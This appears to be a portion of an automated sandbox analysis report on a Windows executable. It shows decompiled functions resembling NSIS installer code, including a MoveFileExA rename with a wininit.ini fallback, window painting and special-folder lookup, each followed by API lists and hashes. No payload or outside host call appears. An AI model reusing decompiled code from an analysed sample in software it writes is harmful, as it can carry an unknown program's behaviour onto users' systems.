                                                                    0x00404075
                                                                    0x00404077
                                                                    0x0040407c
                                                                    0x00000000
                                                                    0x0040407c
                                                                    0x00404030
                                                                    0x00403f05
                                                                    0x00403f08
                                                                    0x00403f0d
                                                                    0x00403f1e
                                                                    0x00403f1e
                                                                    0x00403f25
                                                                    0x00403f28
                                                                    0x00403f2a
                                                                    0x00403f2f
                                                                    0x00403f38
                                                                    0x00403f3e
                                                                    0x00403f4a
                                                                    0x00403f4d
                                                                    0x00403f56
                                                                    0x00403f5b
                                                                    0x00403f5e
                                                                    0x00403f63
                                                                    0x00403f7a
                                                                    0x00403f81
                                                                    0x00403f94
                                                                    0x00403f97
                                                                    0x00403fac
                                                                    0x00403fb3
                                                                    0x00403fb8
                                                                    0x00403fbd
                                                                    0x00403fbd
                                                                    0x00403fcc
                                                                    0x00403fdb
                                                                    0x00403fdd
                                                                    0x00403ff3
                                                                    0x00404002
                                                                    0x00404004
                                                                    0x00000000

                                                                    APIs
                                                                    • CheckDlgButton.USER32 ref: 00403F7A
                                                                    • GetDlgItem.USER32 ref: 00403F8E
                                                                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403FAC
                                                                    • GetSysColor.USER32(?), ref: 00403FBD
                                                                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FCC
                                                                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FDB
                                                                    • lstrlenA.KERNEL32(?), ref: 00403FE5
                                                                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FF3
                                                                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404002
                                                                    • GetDlgItem.USER32 ref: 00404065
                                                                    • SendMessageA.USER32(00000000), ref: 00404068
                                                                    • GetDlgItem.USER32 ref: 00404093
                                                                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040D3
                                                                    • LoadCursorA.USER32 ref: 004040E2
                                                                    • SetCursor.USER32(00000000), ref: 004040EB
                                                                    • ShellExecuteA.SHELL32(0000070B,open,007A1F20,00000000,00000000,00000001), ref: 004040FE
                                                                    • LoadCursorA.USER32 ref: 0040410B
                                                                    • SetCursor.USER32(00000000), ref: 0040410E
                                                                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040413A
                                                                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040414E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                    • String ID: N$open
                                                                    • API String ID: 3615053054-904208323
                                                                    • Opcode ID: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
                                                                    • Instruction ID: 2049aa6b61ecefec59fc3e575142d3045787f4aa2f6754ef1ed68d4f44ea64a4
                                                                    • Opcode Fuzzy Hash: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
                                                                    • Instruction Fuzzy Hash: 7C61A171A40309BFEB109F60CC45F6A7B69EB94715F108026FB01BA2D1C7B8E991CF99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405707, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 151filememorystringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 94%
                                                                    			E00405707(long _a4, long _a16) {
				CHAR* _v0;
				intOrPtr* _t13;
				long _t14;
				int _t19;
				void* _t27;
				long _t28;
				intOrPtr* _t36;
				int _t42;
				intOrPtr* _t43;
				long _t48;
				CHAR* _t50;
				void* _t52;
				void* _t54;

				_t13 = E00405CD2("KERNEL32.dll", "MoveFileExA");
				_t50 = _v0;
				if(_t13 != 0) {
					_t19 =  *_t13(_a4, _t50, 5);
					if(_t19 != 0) {
						L16:
						 *0x7a3010 =  *0x7a3010 + 1;
						return _t19;
					}
				}
				 *0x7a1710 = 0x4c554e;
				if(_t50 == 0) {
					L5:
					_t14 = GetShortPathNameA(_a4, 0x7a1188, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						_t42 = wsprintfA(0x7a0d88, "%s=%s\r\n", 0x7a1710, 0x7a1188);
						GetWindowsDirectoryA(0x7a1188, 0x3f0);
						lstrcatA(0x7a1188, "\\wininit.ini");
						_t19 = CreateFileA(0x7a1188, 0xc0000000, 0, 0, 4, 0x8000080, 0);
						_t54 = _t19;
						if(_t54 == 0xffffffff) {
							goto L16;
						}
						_t48 = GetFileSize(_t54, 0);
						_t5 = _t42 + 0xa; // 0xa
						_t52 = GlobalAlloc(0x40, _t48 + _t5);
						if(_t52 == 0 || ReadFile(_t54, _t52, _t48,  &_a16, 0) == 0 || _t48 != _a16) {
							L15:
							_t19 = CloseHandle(_t54);
							goto L16;
						} else {
							if(E00405624(_t52, "[Rename]\r\n") != 0) {
								_t27 = E00405624(_t25 + 0xa, "\n[");
								if(_t27 == 0) {
									L13:
									_t28 = _t48;
									L14:
									E00405670(_t52 + _t28, 0x7a0d88, _t42);
									SetFilePointer(_t54, 0, 0, 0);
									WriteFile(_t54, _t52, _t48 + _t42,  &_a4, 0);
									GlobalFree(_t52);
									goto L15;
								}
								_t36 = _t27 + 1;
								_t43 = _t36;
								if(_t36 >= _t52 + _t48) {
									L21:
									_t28 = _t36 - _t52;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t42)) =  *_t43;
									_t43 = _t43 + 1;
								} while (_t43 < _t52 + _t48);
								goto L21;
							}
							E004059BF(_t52 + _t48, "[Rename]\r\n");
							_t48 = _t48 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E00405690(_t50, 0, 1));
					_t14 = GetShortPathNameA(_t50, 0x7a1710, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						goto L5;
					}
				}
				return _t14;
			}
















                                                                    0x00405715
                                                                    0x0040571c
                                                                    0x00405720
                                                                    0x00405729
                                                                    0x0040572d
                                                                    0x00405879
                                                                    0x00405879
                                                                    0x00000000
                                                                    0x00405879
                                                                    0x0040572d
                                                                    0x00405739
                                                                    0x0040574f
                                                                    0x00405777
                                                                    0x00405782
                                                                    0x00405786
                                                                    0x004057a9
                                                                    0x004057b1
                                                                    0x004057bd
                                                                    0x004057d4
                                                                    0x004057da
                                                                    0x004057df
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004057ee
                                                                    0x004057f0
                                                                    0x004057fd
                                                                    0x00405801
                                                                    0x00405872
                                                                    0x00405873
                                                                    0x00000000
                                                                    0x0040581d
                                                                    0x0040582a
                                                                    0x0040588f
                                                                    0x00405896
                                                                    0x0040583d
                                                                    0x0040583d
                                                                    0x0040583f
                                                                    0x00405848
                                                                    0x00405853
                                                                    0x00405865
                                                                    0x0040586c
                                                                    0x00000000
                                                                    0x0040586c
                                                                    0x00405898
                                                                    0x0040589e
                                                                    0x004058a0
                                                                    0x004058af
                                                                    0x004058af
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004058a2
                                                                    0x004058a2
                                                                    0x004058a4
                                                                    0x004058a7
                                                                    0x004058ab
                                                                    0x00000000
                                                                    0x004058a2
                                                                    0x00405835
                                                                    0x0040583a
                                                                    0x00000000
                                                                    0x0040583a
                                                                    0x00405801
                                                                    0x00405751
                                                                    0x0040575c
                                                                    0x00405765
                                                                    0x00405769
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405769
                                                                    0x00405883

                                                                    APIs
                                                                      • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
                                                                      • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
                                                                      • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
                                                                    • GetShortPathNameA.KERNEL32 ref: 00405765
                                                                    • GetShortPathNameA.KERNEL32 ref: 00405782
                                                                    • wsprintfA.USER32 ref: 004057A0
                                                                    • GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
                                                                    • lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
                                                                    • CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007A0D88,00000000,-0000000A,00409308,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405853
                                                                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405865
                                                                    • GlobalFree.KERNEL32 ref: 0040586C
                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405873
                                                                      • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
                                                                      • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocCreateDirectoryFreeLibraryLoadModulePointerProcReadSizeWindowsWritelstrcatwsprintf
                                                                    • String ID: %s=%s$KERNEL32.dll$MoveFileExA$[Rename]$\wininit.ini
                                                                    • API String ID: 3633819597-1342836890
                                                                    • Opcode ID: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
                                                                    • Instruction ID: e9cd1c615693de8fff4c10b400b586db3ed10c1a7fdb79d3500086280aae1fa0
                                                                    • Opcode Fuzzy Hash: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
                                                                    • Instruction Fuzzy Hash: 8F412132640A057AE32027228C49F6B3A5CDF95745F144636FE06F62D2EA78EC018AAD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 90%
                                                                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a2f88;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x7a2780, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a2f84;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                    0x0040100a
                                                                    0x00401039
                                                                    0x00401047
                                                                    0x0040104d
                                                                    0x00401051
                                                                    0x0040105b
                                                                    0x00401061
                                                                    0x00401064
                                                                    0x004010f3
                                                                    0x00401089
                                                                    0x0040108c
                                                                    0x004010a6
                                                                    0x004010bd
                                                                    0x004010cc
                                                                    0x004010cf
                                                                    0x004010d5
                                                                    0x004010d9
                                                                    0x004010e4
                                                                    0x004010ed
                                                                    0x004010ef
                                                                    0x004010ef
                                                                    0x00401100
                                                                    0x00401105
                                                                    0x0040110d
                                                                    0x00401110
                                                                    0x00401112
                                                                    0x00401118
                                                                    0x0040111f
                                                                    0x00401126
                                                                    0x00401130
                                                                    0x00401142
                                                                    0x00401156
                                                                    0x00401160
                                                                    0x00401165
                                                                    0x00401165
                                                                    0x00401110
                                                                    0x0040116e
                                                                    0x00000000
                                                                    0x00401178
                                                                    0x00401010
                                                                    0x00401013
                                                                    0x00401015
                                                                    0x0040101f
                                                                    0x0040101f
                                                                    0x00000000

                                                                    APIs
                                                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                    • GetClientRect.USER32 ref: 0040105B
                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                    • FillRect.USER32 ref: 004010E4
                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                    • DrawTextA.USER32(00000000,007A2780,000000FF,00000010,00000820), ref: 00401156
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                    • String ID: F
                                                                    • API String ID: 941294808-1304234792
                                                                    • Opcode ID: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
                                                                    • Instruction ID: ce6c75dd9c322714a436959803478fdb1fd492375a9fced856522196e90364b0
                                                                    • Opcode Fuzzy Hash: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
                                                                    • Instruction Fuzzy Hash: 9E41BA71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C738EA50DFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004059E1, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 180stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 88%
                                                                    			E004059E1(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				CHAR* _t35;
				signed int _t37;
				signed int _t38;
				signed int _t49;
				char _t51;
				signed int _t61;
				char* _t62;
				char _t67;
				signed int _t69;
				CHAR* _t79;
				signed int _t86;
				signed int _t88;
				void* _t89;

				_t61 = _a8;
				if(_t61 < 0) {
					_t61 =  *( *0x7a275c - 4 + _t61 * 4);
				}
				_t62 = _t61 +  *0x7a2fb8;
				_t35 = 0x7a1f20;
				_t79 = 0x7a1f20;
				if(_a4 - 0x7a1f20 < 0x800) {
					_t79 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t67 =  *_t62;
					_a11 = _t67;
					if(_t67 == 0) {
						break;
					}
					__eflags = _t79 - _t35 - 0x400;
					if(_t79 - _t35 >= 0x400) {
						break;
					}
					_t62 = _t62 + 1;
					__eflags = _t67 - 0xfc;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t79 = _t67;
							_t79 =  &(_t79[1]);
							__eflags = _t79;
						} else {
							 *_t79 =  *_t62;
							_t79 =  &(_t79[1]);
							_t62 = _t62 + 1;
						}
						continue;
					}
					_t37 =  *((char*)(_t62 + 1));
					_t69 =  *_t62;
					_t86 = (_t37 & 0x0000007f) << 0x00000007 | _t69 & 0x0000007f;
					_v28 = _t69;
					_v20 = _t37;
					_t70 = _t69 | 0x00008000;
					_t38 = _t37 | 0x00008000;
					_v24 = _t69 | 0x00008000;
					_t62 = _t62 + 2;
					__eflags = _a11 - 0xfe;
					_v16 = _t38;
					if(_a11 != 0xfe) {
						__eflags = _a11 - 0xfd;
						if(_a11 != 0xfd) {
							__eflags = _a11 - 0xff;
							if(_a11 == 0xff) {
								__eflags = (_t38 | 0xffffffff) - _t86;
								E004059E1(_t62, _t79, _t86, _t79, (_t38 | 0xffffffff) - _t86);
							}
							L38:
							_t79 =  &(_t79[lstrlenA(_t79)]);
							_t35 = 0x7a1f20;
							continue;
						}
						__eflags = _t86 - 0x1b;
						if(_t86 != 0x1b) {
							__eflags = (_t86 << 0xa) + 0x7a4000;
							E004059BF(_t79, (_t86 << 0xa) + 0x7a4000);
						} else {
							E0040591D(_t79,  *0x7a2f84);
						}
						__eflags = _t86 + 0xffffffeb - 6;
						if(_t86 + 0xffffffeb < 6) {
							L29:
							E00405BFB(_t79);
						}
						goto L38;
					}
					_a8 = _a8 & 0x00000000;
					 *_t79 =  *_t79 & 0x00000000;
					_t88 = 4;
					__eflags = _v20 - _t88;
					if(_v20 != _t88) {
						_t49 = _v28;
						__eflags = _t49 - 0x2b;
						if(_t49 != 0x2b) {
							__eflags = _t49 - 0x26;
							if(_t49 != 0x26) {
								__eflags = _t49 - 0x25;
								if(_t49 != 0x25) {
									__eflags = _t49 - 0x24;
									if(_t49 != 0x24) {
										goto L19;
									}
									GetWindowsDirectoryA(_t79, 0x400);
									goto L18;
								}
								GetSystemDirectoryA(_t79, 0x400);
								goto L18;
							}
							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "ProgramFilesDir", _t79);
							__eflags =  *_t79;
							if( *_t79 != 0) {
								goto L29;
							}
							E004059BF(_t79, "C:\\Program Files");
							goto L18;
						} else {
							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "CommonFilesDir", _t79);
							L18:
							__eflags =  *_t79;
							if( *_t79 != 0) {
								goto L29;
							}
							goto L19;
						}
					} else {
						_a8 = "\\Microsoft\\Internet Explorer\\Quick Launch";
						L19:
						__eflags =  *0x7a3004;
						if( *0x7a3004 == 0) {
							_t88 = 2;
						}
						do {
							_t88 = _t88 - 1;
							_t51 = SHGetSpecialFolderLocation( *0x7a2f84,  *(_t89 + _t88 * 4 - 0x18),  &_v8);
							__eflags = _t51;
							if(_t51 != 0) {
								 *_t79 =  *_t79 & 0x00000000;
								__eflags =  *_t79;
								goto L25;
							}
							__imp__SHGetPathFromIDListA(_v8, _t79);
							_v12 = _t51;
							E0040521C(_t70, _v8);
							__eflags = _v12;
							if(_v12 != 0) {
								break;
							}
							L25:
							__eflags = _t88;
						} while (_t88 != 0);
						__eflags =  *_t79;
						if( *_t79 != 0) {
							__eflags = _a8;
							if(_a8 != 0) {
								lstrcatA(_t79, _a8);
							}
						}
						goto L29;
					}
				}
				 *_t79 =  *_t79 & 0x00000000;
				if(_a4 == 0) {
					return _t35;
				}
				return E004059BF(_a4, _t35);
			}






















                                                                    0x004059e8
                                                                    0x004059ef
                                                                    0x00405a00
                                                                    0x00405a00
                                                                    0x00405a0a
                                                                    0x00405a0c
                                                                    0x00405a13
                                                                    0x00405a1b
                                                                    0x00405a21
                                                                    0x00405a24
                                                                    0x00405a24
                                                                    0x00405bd5
                                                                    0x00405bd5
                                                                    0x00405bd9
                                                                    0x00405bdc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405a31
                                                                    0x00405a37
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405a3d
                                                                    0x00405a3e
                                                                    0x00405a41
                                                                    0x00405bc8
                                                                    0x00405bd2
                                                                    0x00405bd4
                                                                    0x00405bd4
                                                                    0x00405bca
                                                                    0x00405bcc
                                                                    0x00405bce
                                                                    0x00405bcf
                                                                    0x00405bcf
                                                                    0x00000000
                                                                    0x00405bc8
                                                                    0x00405a47
                                                                    0x00405a4b
                                                                    0x00405a5b
                                                                    0x00405a62
                                                                    0x00405a65
                                                                    0x00405a68
                                                                    0x00405a6a
                                                                    0x00405a6d
                                                                    0x00405a70
                                                                    0x00405a71
                                                                    0x00405a75
                                                                    0x00405a78
                                                                    0x00405b73
                                                                    0x00405b77
                                                                    0x00405ba7
                                                                    0x00405bab
                                                                    0x00405bb0
                                                                    0x00405bb4
                                                                    0x00405bb4
                                                                    0x00405bb9
                                                                    0x00405bbf
                                                                    0x00405bc1
                                                                    0x00000000
                                                                    0x00405bc1
                                                                    0x00405b79
                                                                    0x00405b7c
                                                                    0x00405b91
                                                                    0x00405b98
                                                                    0x00405b7e
                                                                    0x00405b85
                                                                    0x00405b85
                                                                    0x00405ba0
                                                                    0x00405ba3
                                                                    0x00405b6b
                                                                    0x00405b6c
                                                                    0x00405b6c
                                                                    0x00000000
                                                                    0x00405ba3
                                                                    0x00405a7e
                                                                    0x00405a82
                                                                    0x00405a87
                                                                    0x00405a88
                                                                    0x00405a8b
                                                                    0x00405a96
                                                                    0x00405a99
                                                                    0x00405a9c
                                                                    0x00405ab5
                                                                    0x00405ab8
                                                                    0x00405ae5
                                                                    0x00405ae8
                                                                    0x00405af8
                                                                    0x00405afb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405b03
                                                                    0x00000000
                                                                    0x00405b03
                                                                    0x00405af0
                                                                    0x00000000
                                                                    0x00405af0
                                                                    0x00405aca
                                                                    0x00405acf
                                                                    0x00405ad2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405ade
                                                                    0x00000000
                                                                    0x00405a9e
                                                                    0x00405aae
                                                                    0x00405b09
                                                                    0x00405b09
                                                                    0x00405b0c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405b0c
                                                                    0x00405a8d
                                                                    0x00405a8d
                                                                    0x00405b0e
                                                                    0x00405b0e
                                                                    0x00405b15
                                                                    0x00405b19
                                                                    0x00405b19
                                                                    0x00405b1a
                                                                    0x00405b1d
                                                                    0x00405b29
                                                                    0x00405b2f
                                                                    0x00405b31
                                                                    0x00405b50
                                                                    0x00405b50
                                                                    0x00000000
                                                                    0x00405b50
                                                                    0x00405b37
                                                                    0x00405b40
                                                                    0x00405b43
                                                                    0x00405b48
                                                                    0x00405b4c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405b53
                                                                    0x00405b53
                                                                    0x00405b53
                                                                    0x00405b57
                                                                    0x00405b5a
                                                                    0x00405b5c
                                                                    0x00405b60
                                                                    0x00405b66
                                                                    0x00405b66
                                                                    0x00405b60
                                                                    0x00000000
                                                                    0x00405b5a
                                                                    0x00405a8b
                                                                    0x00405be2
                                                                    0x00405bec
                                                                    0x00405bf8
                                                                    0x00405bf8
                                                                    0x00000000

                                                                    APIs
                                                                    • SHGetSpecialFolderLocation.SHELL32(00404D9A,00789938,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000), ref: 00405B29
                                                                    • SHGetPathFromIDListA.SHELL32(00789938,007A1F20), ref: 00405B37
                                                                    • lstrcatA.KERNEL32(007A1F20,00000000), ref: 00405B66
                                                                    • lstrlenA.KERNEL32(007A1F20,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000,00000000,0078ED38,00789938), ref: 00405BBA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FolderFromListLocationPathSpeciallstrcatlstrlen
                                                                    • String ID: C:\Program Files$CommonFilesDir$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                    • API String ID: 4227507514-3711765563
                                                                    • Opcode ID: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
                                                                    • Instruction ID: 88f6e72dca0f61d75e3a0e3e21e18f1b78018e843eea250326dc72cf64c4fd20
                                                                    • Opcode Fuzzy Hash: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
